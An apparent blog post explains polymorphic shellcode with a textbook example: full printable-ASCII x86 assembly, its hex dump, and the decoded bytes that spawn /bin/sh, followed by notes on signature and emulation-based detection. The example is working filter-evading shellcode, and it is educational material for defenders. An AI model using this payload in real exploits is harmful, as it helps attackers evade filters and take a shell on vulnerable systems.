What the hell ! | Damn’ Shell

Smuggling – Wikipedia describes the word as “the illegal transportation of objects or people, such as out of a building, into a prison, or across an international border, in violation of applicable laws or other regulations”.

Come to think of it – When you think of the word ‘smuggling’ the first thing that comes to mind is – ‘its wrong’ which is true but if you can overlook the legalities and dive a bit deeper into the specifics you might just find a new or rather ‘ingenious’ transportation method that we’ve been oblivious to all along. This sort of ingenuity carries on from the real world into the virtual world considering its an extension of the real world by design. The art of stealth is at the core of offensive computer security and being able to smuggle stuff into a target environment is considered ‘nirvana’ in the field.

The bad guys (for lack of a better word) spend a considerable amount of time mastering the art of smuggling all kinds of malicious code onto a target environment and in some cases the amount of time spent developing the actual code/payload is far less when compared to the amount of time spent devising a way to get it to its destination.

One such method involves employing polymorphism – a concept that clearly has one too many definitions (thanks to the technology/internet Gurus). Its nothing more than code that modifies (modification can be addition/deletion) itself when executed. This underlying idea allows you to change what your code/payload looks like but never really change what it does (essentially a state change without any change in functionality) which makes it ideal to evade detection during transportation. Put simply, it’s a bomb that doesn’t look like a bomb until its ready.

Of all the virtual bomb making tools, the one that’s really ubiquitous is ‘shellcode‘ for it takes away most of the abstractions of higher level programming languages. Shellcode is code written in ‘assembly’ without any restrictions on the layout of the code i.e. its position independent. In other words shellcode allows you to write code in a language that is almost native to the target (i.e. system/processor) providing you with a great deal of flexibility.

For example – ASCII shellcode can get past most ASCII character checks/filters. Here is what it looks like in assembly [1]

 

BITS 32

push esp                               ; Put current ESP
pop eax                                ; into EAX.
sub eax, 0x39393333                    ; Subtract printable values
sub eax,0x72727550                     ; to add 860 to EAX.
sub eax,0x54545421
push eax                               ; Put EAX back into ESP.
pop esp                                ; Effectively ESP = ESP + 860

and eax,0x454e4f4a
and eax,0x3a313035                     ; Zero out EAX.

sub eax,0x346d6d25                     ; Subtract printable values
sub eax,0x256d6d25                     ; to make EAX = 0x80cde189.
sub eax,0x2557442d                     ; (last 4 bytes from shellcode.bin)

push eax                               ; Push these bytes to stack at ESP.
sub eax,0x59316659                     ; Subtract more printable values
sub eax,0x59667766                     ; to make EAX = 0x53e28951.
sub eax,0x7a537a79                     ; (next 4 bytes of shellcode from the end)
push eax
sub eax,0x25696969
sub eax,0x25786b5a
sub eax,0x25774625
push eax                                         ; EAX = 0xe3896e69
sub eax,0x366e5858
sub eax,0x25773939
sub eax,0x25747470
push eax                                         ; EAX = 0x622f6868
sub eax,0x25257725
sub eax,0x71717171
sub eax,0x5869506a
push eax                                         ; EAX = 0x732f2f68
sub eax,0x63636363
sub eax,0x44307744
sub eax,0x7a434957
push eax                                         ; EAX = 0x51580b6a
sub eax,0x63363663
sub eax,0x6d543057
push eax                                         ; EAX = 0x80cda4b0
sub eax,0x54545454
sub eax,0x304e4e25
sub eax,0x32346f25
sub eax,0x302d6137
push eax                                         ; EAX = 0x99c931db
sub eax,0x78474778
sub eax,0x78727272
sub eax,0x774f4661
push eax                                         ; EAX = 0x31c03190
sub eax,0x41704170
sub eax,0x2d772d4e
sub eax,0x32483242
push eax                                         ; EAX = 0x90909090
push eax
push eax                                         ; Build a NOP sled.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

And when assembled into machine code, here’s what you get (note the repetitive pattern in its ASCII representation to the right)

00000000 54 58 2d 33 33 39 39 2d 50 75 72 72 2d 21 54 54 |TX-3399-Purr-!TT|
00000010 54 50 5c 25 4a 4f 4e 45 25 35 30 31 3a 2d 25 6d |TP\%JONE%501:-%m|
00000020 6d 34 2d 25 6d 6d 25 2d 2d 44 57 25 50 2d 59 66 |m4-%mm%–DW%P-Yf|
00000030 31 59 2d 66 77 66 59 2d 79 7a 53 7a 50 2d 69 69 |1Y-fwfY-yzSzP-ii|
00000040 69 25 2d 5a 6b 78 25 2d 25 46 77 25 50 2d 58 58 |i%-Zkx%-%Fw%P-XX|
00000050 6e 36 2d 39 39 77 25 2d 70 74 74 25 50 2d 25 77 |n6-99w%-ptt%P-%w|
00000060 25 25 2d 71 71 71 71 2d 6a 50 69 58 50 2d 63 63 |%%-qqqq-jPiXP-cc|
00000070 63 63 2d 44 77 30 44 2d 57 49 43 7a 50 2d 63 36 |cc-Dw0D-WICzP-c6|
00000080 36 63 2d 57 30 54 6d 50 2d 54 54 54 54 2d 25 4e |6c-W0TmP-TTTT-%N|
00000090 4e 30 2d 25 6f 34 32 2d 37 61 2d 30 50 2d 78 47 |N0-%o42-7a-0P-xG|
000000a0 47 78 2d 72 72 72 78 2d 61 46 4f 77 50 2d 70 41 |Gx-rrrx-aFOwP-pA|
000000b0 70 41 2d 4e 2d 77 2d 2d 42 32 48 32 50 50 50 50 |pA-N-w–B2H2PPPP|
000000c0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 |PPPPPPPPPPPPPPPP| 

The above code morphs or rather loads additional malicious code into memory when executed as you can see below i.e. the shellcode will not reveal its actual form until it is eventually executed on a real CPU.
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1……j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80

 

polyshellcode

So the big question – What can we do ?

Well – Traditional intrusion detection systems (IDS) like Snort or *WAFs can be used to detect shellcode, using signature matching techniques where we look for known/recurring patterns or specific parts of the shellcode. Although this is polymorphic we can look for NOP sled pattern, ‘sub’ instruction containing repetitive characters or a combination.

Note – The above example is just one form of polymorphic shellcode. Attackers are constantly working to find more (again ingenious damn’ it) ways to sneak stuff across. Another interesting method is the use of polymorphic shellcode engines to create different forms of the same initial shellcode by encrypting its body with a different random key each time, and by prepending to it a decryption routine that makes it self-decrypting. In such scenarios conventional signature based detection methods fall short and require security researchers to detect network streams that contain polymorphic exploit code by passively monitoring the incoming network traffic where you attempt to “execute” each incoming request in a virtual environment as if it was executable code [2].

 

*WAF – Web application firewalls

Reference –

[1] Jon Erickson “Hacking: The Art of Exploitation, 2nd edition”

[2] Michalis Polychronaki, Kostas G. Anagnostakis and Evangelos P. Markatos “Network-Level Polymorphic Shellcode Detection UsingEmulation” Institute of Computer Science, Foundation for Research & Technology – Hellas, Institute for Infocomm Research, Singapore

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s